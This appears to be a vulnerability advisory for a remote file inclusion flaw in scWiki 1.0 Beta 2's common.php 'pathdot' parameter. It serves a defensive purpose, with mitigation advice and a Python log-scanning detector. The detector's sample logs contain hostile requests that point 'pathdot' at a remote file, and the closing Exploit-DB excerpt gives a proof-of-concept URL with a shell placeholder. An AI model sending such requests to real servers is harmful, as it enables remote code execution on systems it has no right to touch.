vendor: scWiki
by: Unknown
CVSS: 7.5 (HIGH)
Remote File Inclusion
CWE: 98
Product Name: scWiki
Affected Version From: 1.0 Beta 2
Affected Version To: 1.0 Beta 2
Patch Exists: NO
2007

scWiki 1.0 Beta 2 (common.php pathdot) Remote File Inclusion Vulnerability

scWiki 1.0 Beta 2 contains a remote file inclusion vulnerability in the 'common.php' file. An attacker can exploit it by manipulating the 'pathdot' parameter of 'common.php' to include arbitrary remote files. This can lead to remote code execution or unauthorized access to sensitive information.

Mitigation:

To mitigate this vulnerability, update to a patched version of scWiki or apply the vendor-supplied patch where one is available (this entry lists Patch Exists: NO). Additionally, ensure that input validation and sanitization are in place so that malicious input cannot be passed to the 'pathdot' parameter.
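
A detection sketch for the request pattern described above, added here as an example and not part of the original advisory or of scWiki: it scans web access logs for requests to includes/common.php that supply 'pathdot', and separates values naming a remote resource from other client-set values. The log lines are constructed; the Apache combined log format and the premise that clients never legitimately set 'pathdot' are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (Apache combined format assumed), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [03/Nov/2007:10:00:01 +0000] "GET /index.php?page=Home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [03/Nov/2007:10:00:05 +0000] "GET /includes/common.php?pathdot=http://files.example.invalid/x.txt HTTP/1.1" 200 312 "-" "curl/7.16"
203.0.113.9 - - [03/Nov/2007:10:00:09 +0000] "GET /wiki/includes/common.php?pathdot=%68ttp%3A%2F%2Ffiles.example.invalid%2Fx.txt HTTP/1.1" 200 298 "-" "curl/7.16"
198.51.100.7 - - [03/Nov/2007:10:00:12 +0000] "GET /includes/common.php?pathdot=../ HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.7 - - [03/Nov/2007:10:00:15 +0000] "GET /includes/common.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

# client, timestamp, request target, status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" (\d{3})')
# A value that names a remote resource: "scheme:" prefix or protocol-relative "//host".
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//)', re.IGNORECASE)


def scan(log_text):
    """Return (client, timestamp, status, verdict, value) per pathdot request."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        client, when, target, status = m.groups()
        url = urlsplit(target)
        # Decode the path so an encoded "common%2ephp" is still recognised.
        if not unquote(url.path).endswith("/includes/common.php"):
            continue
        # parse_qs percent-decodes each value once before we inspect it.
        for value in parse_qs(url.query, keep_blank_values=True).get("pathdot", []):
            verdict = "remote-include" if REMOTE_RE.match(value) else "client-set-path"
            findings.append((client, when, int(status), verdict, value))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="  ")
```

A "remote-include" hit answered with status 200 is the case to triage first; "client-set-path" hits show the parameter being set from outside at all.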
Source

Exploit-DB raw data:

scWiki 1.0 Beta 2 (common.php pathdot) Remote File Inclusion Vulnerability
http://heanet.dl.sourceforge.net/sourceforge/sc-wiki/scwiki_beta2.zip
POC :
    /includes/common.php?pathdot=Shell

# milw0rm.com [2007-11-03]